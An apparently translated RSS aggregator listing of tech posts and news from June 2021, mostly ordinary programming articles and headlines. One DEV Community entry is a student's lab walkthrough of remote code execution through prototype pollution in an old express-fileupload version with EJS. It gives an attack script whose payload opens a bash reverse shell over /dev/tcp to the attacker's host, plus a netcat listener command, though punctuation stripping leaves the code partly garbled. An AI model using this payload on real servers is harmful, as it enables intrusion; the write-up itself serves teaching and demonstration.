IT |
MOONGIFT |
WinBox.js - Window management for web apps |
http://feedproxy.google.com/~r/moongift/~3/ImgN-P70p-o/
|
WinBox.js - Window management for web apps. Web applications are appearing one after another, and more of them now have complex screens. |
2021-06-05 21:00:00 |
python |
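New posts tagged Python - Qiita |
Installing the ESP32 firmware on Maixduino and reading analog input (Maixpy) |
https://qiita.com/ykoji/items/9c71e69e2bf4a7e61d86
|
Installing the ESP32 firmware on Maixduino and reading analog input (Maixpy). Introduction: I previously wrote the following article about SIPEED's Maixduino; this time I would like to flash the ESP32 firmware and go as far as reading analog input values by writing Python code on the Maixduino. |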
2021-06-05 21:00:07 |
python |
New posts tagged Python - Qiita |
[Python] Notes on saving web pages as PDF using Selenium |
https://qiita.com/KWS_0901/items/33ae052e2e4694a6b4f1
|
[Python] Notes on saving web pages as PDF using Selenium. A note on how to use Python and Selenium to access multiple web pages and save those pages as PDFs. |
2021-06-05 20:12:22 |
js |
New posts tagged JavaScript - Qiita |
Can the camera be used on a smartphone and in the browser? Trying out device retrieval |
https://qiita.com/grayhamchan/items/60521b32be80b9ac3005
|
|
2021-06-05 20:32:54 |
js |
New posts tagged JavaScript - Qiita |
Trying out video playback in a web browser |
https://qiita.com/grayhamchan/items/a3d3ae225cd0659f9f5a
|
|
2021-06-05 20:31:45 |
js |
New posts tagged JavaScript - Qiita |
Image retrieval web API: trying out the Pixabay API |
https://qiita.com/grayhamchan/items/605346dec7dedbb1171b
|
Image retrieval web API: trying out the Pixabay API. Create an official Pixabay account and obtain an API key. |
2021-06-05 20:18:46 |
Program |
New questions for [all tags] | teratail |
HTML: the character font differs from the text. |
https://teratail.com/questions/342367?rss=all
|
HTML: the character font differs from the text. |
2021-06-05 20:35:45 |
Program |
New questions for [all tags] | teratail |
Tweet posts are not being saved. |
https://teratail.com/questions/342366?rss=all
|
|
2021-06-05 20:31:04 |
Program |
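New questions for [all tags] | teratail |
[Vue x Firestore] I want to fetch post information from the "bookmarks" subcollection and display it |
https://teratail.com/questions/342365?rss=all
|
[Vue x Firestore] I want to fetch post information from the "bookmarks" subcollection and display it. I want to fetch post information from the "bookmarks" subcollection and display it. |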
2021-06-05 20:30:41 |
Program |
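New questions for [all tags] | teratail |
[Vue x Firestore] I want to re-display a list with a condition applied, based on data the parent component received from a child component |
https://teratail.com/questions/342364?rss=all
|
[Vue x Firestore] I want to re-display a list with a condition applied, based on data the parent component received from a child component. I want to re-display a list with a condition applied, based on data the parent component received from a child component. Currently, I have created a search box with an input tag in post.vue (the child component), and I pass the value entered there to board.vue (the parent component) with emit. |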
2021-06-05 20:28:27 |
Program |
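New questions for [all tags] | teratail |
In Unity, the ambient light does not change even when I change the skybox |
https://teratail.com/questions/342363?rss=all
|
In Unity, the ambient light does not change even when I change the skybox. Background / what I want to achieve: In Unity, I want to be able to switch between day and night in real time. |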
2021-06-05 20:06:37 |
Ruby |
New posts tagged Ruby - Qiita |
Let's try using Ruby's standard module "NKF", shall we? |
https://qiita.com/ren0826jam/items/68a64e1be03fef98ecb5
|
What is NKF? The NKF module is a Ruby standard library that can convert character encodings. |
2021-06-05 21:00:05 |
Ruby |
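New posts tagged Ruby - Qiita |
[Ruby] On pass-by-value and pass-by-reference of method arguments, and destructive methods |
https://qiita.com/Jackson123/items/2434bf0697f2da666deb
|
[Ruby] On pass-by-value and pass-by-reference of method arguments, and destructive methods. Introduction: While studying Ruby, I learned about the relationship between pass-by-value, pass-by-reference and destructive methods, so here are my notes. What I learned: I was writing code like the following, and it behaved differently from what I expected, so I dug deeper. |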
2021-06-05 20:05:22 |
Ruby |
New posts tagged Rails - Qiita |
Let's try using Ruby's standard module "NKF", shall we? |
https://qiita.com/ren0826jam/items/68a64e1be03fef98ecb5
|
What is NKF? The NKF module is a Ruby standard library that can convert character encodings. |
2021-06-05 21:00:05 |
Overseas Tech |
Ars Technica |
There’s hope for American movie theaters after all |
https://arstechnica.com/?p=1770060
|
potential |
2021-06-05 11:30:42 |
Overseas Tech |
DEV Community |
Entity-Relationship Diagram |
https://dev.to/hebashakeel/entity-relationship-diagram-3jh
|
Entity-Relationship Diagram. It is a high-level data model diagram which defines the conceptual view of the database. It indicates the relation among entities. Before making the actual database, first the ER diagram is drawn to show the relations and many more things. Components of ER Diagram. Entity: i) It is a real-world object. ii) It can be physical. iii) It can be logical. Entity Set: It is a set or collection of entities of the same type which share similar properties or attributes. An entity can be characterized into two types: i) Strong Entity: it has a Primary Key; it is not dependent; they are shown in a single rectangle. ii) Weak Entity: it doesn't have sufficient attributes to form a Primary Key; it is dependent on the Strong Entity; they are shown in a double rectangle. Total Participation: A Weak Entity always has total participation with the Relationship. This means that each entity in the entity set must compulsorily participate in at least one relationship instance in that relationship set. Attributes: They are the properties that describe the entity. An attribute can be characterized into: Simple Attributes: they are represented by an oval. Multi-valued Attributes: multiple values for a single attribute; they are represented by a double oval. Single-valued Attributes: each and every entity will have only one value. Example: ID. Composite Attributes: those attributes that can be divided further. Derived Attributes: those attributes whose values are derived from another attribute; they are represented by a dotted oval. Example: Age is a derived attribute, since age can be derived from the Date of Birth. Key Attribute: an attribute which can uniquely define the whole tuple is called a Key Attribute. Example: ID. Relationship: It indicates how each and every entity is related with every other entity. Degree of Relationship: A relationship where a number of different entity sets participate is called the degree of a relationship. Degree of relationship can be categorized into the following types. Unary: only one entity set participates in a relationship. Binary: two entity sets participate in a relationship. It is further divided into four types: i) One to One, ii) One to Many, iii) Many to One, iv) Many to Many. Ternary: when three entity sets participate in a relationship. n-ary: when more than three entity sets are involved in a relationship, it is called an n-ary relationship. Summary of ER Diagram Symbols: Entity or Strong Entity, Weak Entity, Attribute, Multi-valued Attribute, Relationship, Weak Relationship. That's all for today. Thank you. Hope to see you in my next article. |
2021-06-05 11:44:37 |
Overseas Tech |
DEV Community |
Typescript: String Enums, the easy way |
https://dev.to/mandraketech/typescript-string-enums-the-easy-way-1ke4
|
Typescript: String Enums, the easy way. The most common use cases for an enum are: keys and associated non-string values; keys and string values that match the keys. Now, don't read this wrong. I just don't want to replicate everything that is written in the Typescript Handbook. The first one is adequately handled in Typescript, just by using: enum MyEnum { first, second, third } But the second case looks more like this: enum MyStringEnum { first = 'first', second = 'second', third = 'third' } As the number of values increases, it starts getting difficult to manage. And I see a lot of boilerplate here. Also, there is scope for mistakes. For example, it is possible to get into this situation: enum MyStringEnum { first = 'fifth', second = 'second', third = 'third' } In the Handbook, look at all the complexity required to do a reverse lookup from the Enums. Here is my proposal to build a simple structure that you can implement quickly. Let's start with defining the values we want to be the keys in the enum: const VALID_ENUM_VALUES = ['first', 'second', 'third'] as const; Notice the "as const" at the end of the statement. This is what will make the difference. Let's define the type that we can use in the code, to ensure we are not using any invalid values: type MyEnum = typeof VALID_ENUM_VALUES[number]; If you type this in VSCode and hover your mouse over MyEnum, you should see that this is the equivalent of defining: type MyEnum = 'first' | 'second' | 'third'; The [number] tells Typescript to get all the number-based subscripts of the array. The additional advantage is, if you make changes to the VALID_ENUM_VALUES array, the MyEnum changes with it. So, if you were to type the following code in the editor: console.log('Valid values of the enum are', VALID_ENUM_VALUES); const valueToCheck = 'first'; console.log('Check if', valueToCheck, 'is part of the enum', VALID_ENUM_VALUES.includes(valueToCheck)); /* Error here, because 'hello' is not a value in the VALID_ENUM_VALUES array */ const typedVar: MyEnum = 'hello'; Reverse lookups are not necessary. But you do want a way to check if a given value is valid in the context of this Enum. For that, let's write a type asserter: function isValid(param: unknown): asserts param is MyEnum { assert(param && typeof param === 'string' && VALID_ENUM_VALUES.includes(param as MyEnum)); } Now, in this context: const myStr = 'first'; if (isValid(myStr)) { /* here, if myStr is implicitly of type MyEnum */ console.log(myStr, 'is a valid Enum value'); } Another use of this construct is in defining Objects with keys. Take a look: type MyRecordType = Record<MyEnum, unknown>; /* the myValue below will error, because is not a valid value */ const myValue: MyRecordType Here, the type definition is the equivalent of: type MyRecordType = { first: unknown, second: unknown, third: unknown } You may change the unknown to any relevant type. So, this gives you a quick way of defining objects with a given structure and defined types. Obviously, more complex cases are better handled manually. Here is another variation of the same: type MyPartialRecordType = Partial<MyRecordType>; /* no error here */ const myPartialValue: MyPartialRecordType This is the equivalent of: type MyPartialRecordType = { first?: unknown, second?: unknown, third?: unknown } If you want to use these in combination, try this: const MUST_HAVE_PARAMS = ['one', 'two'] as const; type MandatoryParams = typeof MUST_HAVE_PARAMS[number]; const OPTIONAL_PARAMS = ['three', 'four'] as const; type OptionalParams = typeof OPTIONAL_PARAMS[number]; type MixedRecord = Record<MandatoryParams, unknown> & Partial<Record<OptionalParams, unknown>>; This is the equivalent of: type MixedRecord = { one: unknown, two: unknown } & { three?: unknown, four?: unknown } or, to simplify it further: type MixedRecord = { one: unknown, two: unknown, three?: unknown, four?: unknown } So, you can now create a Union type, a Record type, and also have an array to validate the values against. Another interesting example, involving Mapped Types: const KNOWN_PARAMS_TYPES = ['id', 'name'] as const; type KnownParams = typeof KNOWN_PARAMS_TYPES[number]; const UNKNOWN_PARAMS_TYPES = ['contentsOfWallet'] as const; type UnknownParams = typeof UNKNOWN_PARAMS_TYPES[number]; type AllParams = KnownParams | UnknownParams; type ValueType<T extends AllParams> = T extends KnownParams ? string : unknown; type ParamType = { [Property in AllParams]: ValueType<Property> }; This is the equivalent of: type ParamType = { id: string, name: string, contentsOfWallet: unknown } This may look like a lot of magic for something that can be defined in less space, but look at what is available: arrays of valid field names that can be used for input validation, for example when you are dealing with http query strings and want to check if the parameter name is valid; string union types for use within the application code, for those places where you would have otherwise used keyof ParamType as the type; a structure that will update itself as you add more parameters to the known / unknown parts. In summary, for cases where you want an array of values to use in various places in the application, and still want type-safe data structures, this kind of organisation will go a long way in making your code extensible, using the power of Typescript. This blog was originally published by Navneet Karnani navneet mandraketech in on his blog at |
2021-06-05 11:30:48 |
Overseas Tech |
DEV Community |
Simple Remote Code Execution on EJS Web Applications with express-fileupload |
https://dev.to/boiledsteak/simple-remote-code-execution-on-ejs-web-applications-with-express-fileupload-3325
|
Simple Remote Code Execution on EJS Web Applications with express-fileupload. TLDR with no explanation. As an IT cybersecurity student, I heavily relied on searching online for guides and forums to help me with my assignments. So this is me giving back to the community. In this post I will explain how to exploit a vulnerability in an older version of a NodeJS library to enable RCE. Many concepts and technologies used will require an intermediate level of hands-on knowledge of cybersecurity. I will not explain every term. The entire process is quite simple. If you are unfamiliar with anything, try to read it up. Everything mentioned is fairly common. This Proof of Concept (POC) is a simple example of RCE. Good for demonstrating RCE to an audience without technical knowledge. I doubt it can be used in the wild for penetration testing or for any malicious purposes. In fact, the author of the dependency has a glaring warning of this vulnerability at the top of their GitHub repo. This exploit was referenced from. The author explains why the outdated dependency is vulnerable. Disclaimer: I am a security student with no professional programming / software engineer experience, so my code may not be following best practices, but they work. Contents: Abstract; Set Up (Attacker, Victim); Launch Attack. Abstract. CVE Code: CVE. CWE Code: CWE. Publish Date: July. Attack Type: Remote Code Execution. Vulnerability: JavaScript Prototype Pollution. Cause: Misconfiguration. Fix: Update Libraries, Proper Network Configuration, Firewalls. Affected Technology: Node, Express, express-fileupload v and earlier, EJS. Set Up. All files needed can be found in my GitHub repository. Higher resolution versions of all images used can be found in there too. boiledsteak EJS Exploit: Remote Code Execution EJS Web Applications using express-fileupload. Attacker. First, set up a Kali Virtual Machine (VM). Ensure all commands are run in bash. Check that Python is installed. Move this file into the Kali VM. EJS RCE attack py (can be found in my GitHub repo): Run this py to perform EJS RCE attack referenced from Timothy November importsimport requests commands to run on victim machinecmd bash c bash i amp gt dev tcp gt amp print Starting Attack polluterequests post files proto outputFunctionName None f x console log process mainModule require child process exec cmd x execute commandrequests get print Finished. Yes, I know a docker would have been lighter than a VM, but the purpose of this POC is more for demonstration, so having a VM makes the process more visual. Next, modify EJS RCE attack py to fit the attacker's machine address and port. Line: change dev tcp to dev tcp <attacker's IP address> <attacker's port to listen for connection from victim>. You could leave it at port. Just ensure that no firewall rules are blocking the ports you use. Modify EJS RCE attack py to fit the victim's machine address and port. Line and line: change the http address to the victim's web address. Victim. This part requires a bit more preparation, since you will need to set up an EJS web server. There are many detailed guides online about EJS and how to create a web app with it, so I won't detail everything in this post. I'll briefly list the steps needed to get one running. First, set up an Ubuntu VM. Ensure it can talk to the Kali VM. Install NodeJS and NPM. Create a directory to contain the webserver code. It should look something like the screenshot below. For now, just create the folders. Don't create the files yet. This step is optional, but I feel it makes the webserver cleaner and easier to navigate. This step is useful if you choose to expand on my attack scenario, for instance adding a database to the webserver, adding multiple web pages, etc. Btw, the command to print a directory tree in Windows is tree A. Okay, the first file to create is package.json. Move it to backend, as pictured in the directory tree screenshot (all files can be found in my GitHub repo): name some website version description main server js scripts start node server js author license ISC dependencies ejs express express fileupload alpha. Open a terminal in the backend folder and run npm install. This installs all needed libraries and dependencies, including EJS. A node_modules folder should appear. Now write the server code, server.js: web server code website starts here importsconst express require express const fileupload require express fileupload const http require http const app express app use fileupload parseNested true set the view engine to ejsapp set view engine ejs app set views frontend pages app get req res gt res render index sever starting const server http Server app const addr const port server listen port addr gt console log Server listening on addr port port. You'll need to change the addr variable in line to match your victim machine's IP address. Next, create a simple HTML page in frontend pages. It needs to be an .ejs file. I created a very plain one, index.ejs. This is to show that this attack does not require the victim to click anything on the website. The vulnerability lies in an outdated dependency used. No XSS needed. I probably don't need to show the code, but here it is lol: <!DOCTYPE html> <html> <head> <title>Some Website</title> </head> <body> <h>This is some website</h> </body> </html> Launch Attack. With everything set up, you can finally launch the attack. First, start the web server from the victim machine. Run npm start in the backend directory where the server.js file is located. Now, on the attacker side, start a nc to listen for a connection from the victim: nc lvp. Then start the actual exploit: python EJS RCE attack py. If everything is done properly, you should be seeing a shell of the victim on the attacker's terminal. From here you can do all kinds of commands to demonstrate RCE. You could do a simple DOS by restarting the machine with init. Or maybe do something even more hackerman by downloading a MSFvenom and opening a metasploit shell. That's all to the attack. It's actually very simple. As I said at the start, this is just a simple RCE POC to show that misconfiguration can lead to severe vulnerabilities. The victim doesn't even need to click anything on the website, and yet the web server can be compromised. That's it. Thank you for reading my first post. Yes, I know it's a very simple and amateur exploit, but I hope someone finds it useful. I'm just a student with no real professional experience, so some of my information may even be false or misinformed. Please let me know if I missed anything. You can read more about JavaScript prototype pollution to understand deeper why this vulnerability even exists. |
2021-06-05 11:18:36 |
Overseas Tech |
DEV Community |
Summer Plans of a Freshman CS student |
https://dev.to/firangizg/summer-plans-of-a-freshman-cs-student-1p68
|
Summer Plans of a Freshman CS student. Hey everyone! As the summer months have started and I have had a sufficient break after university, I was planning how to spend my summer efficiently, since I will be applying for internships in Summer. My freshman year as a Computer Engineering student has ended, and by the end of the summer I will start my applications, so most of the tasks I will try to accomplish by the end of summer will be geared towards that. Learn Python: I have been learning Python inefficiently for a long time and think that this free time during the summer could be used efficiently to learn the fundamentals of Python properly. To do this, I am still searching for good resources, but as of now I am planning to follow the interactive textbook of How to Think Like a Computer Scientist. Comment down below if you have any other good resources to learn Python well. Build Side Projects: While I have been doing small tutorial projects like Madlibs or Rock Paper Scissors as an exercise, I actually want to do two proper side projects and finish them by the end of the summer. I do not need them to be technically complex, but rather quality side projects that people would actually use. If you have any ideas for nice side projects that would let me learn well, I am open to suggestions. Finish the Cracking the Coding Interview book: Since I have not taken a Data Structures and Algorithms class in university yet, I am a bit behind on the content of programming interviews, so I need to read up on the fundamental data structures and algorithms. I have already started reading the Cracking the Coding Interview book and it is very useful. Hopefully, by the end of the summer, I will have mastered enough of the topics in the book. Grind some Leetcode questions: This goes along with plan number. While the book is great for learning, and doing the exercises also helps, I need more practice with questions that will be similar to the interviews I will potentially do. I have compared several practice websites, and I also do not want to keep searching and comparing which website is the best to use, so I will do the questions on Leetcode, even though I am struggling with easy questions right now. Attend hackathons: I love hackathons; the entrepreneurial and innovative spirit of hackathons excites me. And I am most innovative when working with other people, so I will attend virtual hackathons over the summer and hopefully make nice projects, maybe even win some, but that is definitely not the point. Well, these are my plans for this summer. Hopefully that was a fun and insightful read. What are your plans for this summer? If you are working or have an internship, how is it going? |
2021-06-05 11:13:49 |
Overseas Tech |
DEV Community |
Review of Ubuntu after 4 months of daily usage |
https://dev.to/krishnakakade/review-of-ubuntu-after-4-months-of-daily-usage-3815
|
Review of Ubuntu after 4 months of daily usage. Hello all. In this article I will explain my experience of Ubuntu after months of daily heavy usage. Firstly, this is my first time using Ubuntu regularly. I am a Windows guy; I have tried Ubuntu a couple of times, but not with heavy regular usage. So in this article I will cover the pros and cons of Ubuntu, and also the problems I faced and how I solved those things. Overall UI / User Experience review: Transitioning to Ubuntu after using Windows for more than years of regular usage, firstly I am excited for the change and the new ecosystem. I didn't find any flaws or complications in the UI of Ubuntu; in fact, Ubuntu feels like Mac OS to me, which is kind of a cool thing. Now the question arises: what if there is a UI freeze kind of thing, and how am I tackling UI issues? In the case of Windows, my laptop used to show disk usage, and because of that my laptop used to freeze daily, so then I had to restart again and again, and I have pretty good hardware: gigs of RAM, TB HDD, but I don't have an SSD. Now, in the case of Ubuntu as a primary operating system, it's been four months now, and my UI, dock and overall UI froze less than times; if that happens, like the user interface not responding, then the simple fix for that is ALT F and just type r in that box, and it's done, issue solved. Sounds cool, right? But it feels better than it sounds. So no major issues with the UI; everything works fine. So-called command syndrome: Most developers / users think Ubuntu is hard to use. No, that is a myth among a group of folks, because we need to install apps / programs in Ubuntu manually, but there are thousands of resources available on the internet; if you need to install VS Code or LMMS, there is an installation command guide available for that, so installing and removing a program is not a big task. All development things work fine, no worries with that; every app that a developer needs is available in Linux. Problems for which I didn't get a good solution: React Native installation doesn't work; sometimes music breaks, not always, once in a while. The only thing I miss in this OS is playing games; I tried Epic Games through Lutris but it didn't work. That is the only sad thing; other things are smooth like butter. That's it for this one, thank you for reading. Should you switch to Linux? |
2021-06-05 11:11:14 |
Overseas Tech |
Engadget |
The Morning After: Which streaming TV box or stick is the best one for you? |
https://www.engadget.com/roku-fire-tv-google-tv-tma-113319282.html?src=rss_b2c
|
highlights |
2021-06-05 11:33:19 |
News |
BBC News - Home |
G7: Rich nations back deal to tax multinationals |
https://www.bbc.co.uk/news/world-57368247
|
global |
2021-06-05 11:33:33 |
News |
BBC News - Home |
Covid in Scotland: Restriction levels ease for millions of Scots |
https://www.bbc.co.uk/news/uk-scotland-57361513
|
central |
2021-06-05 11:19:37 |
News |
BBC News - Home |
Covid: People in hospital with Indian variant not increasing significantly - NHS boss |
https://www.bbc.co.uk/news/uk-57367849
|
illness |
2021-06-05 11:18:58 |
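News |
Newsweek |
"Safe and secure daily life for the public" rather than a "safe and secure Olympics"! |
https://www.newsweekjapan.jp/stories/world/2021/06/post-96456.php
|
For the Suga cabinet, is holding the Tokyo Olympics more important than the lives of the Japanese people? Do not misread the "signal" of Xi Jinping cheering on the holding of the Tokyo Olympics. As for why Xi Jinping supports holding the Tokyo Olympics, as I have written repeatedly in earlier dated columns, it is because, if the Tokyo Olympics were by any chance cancelled, "COVID infection" would be thrown into sharp focus, which would be to Xi Jinping's disadvantage. |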
2021-06-05 20:12:33 |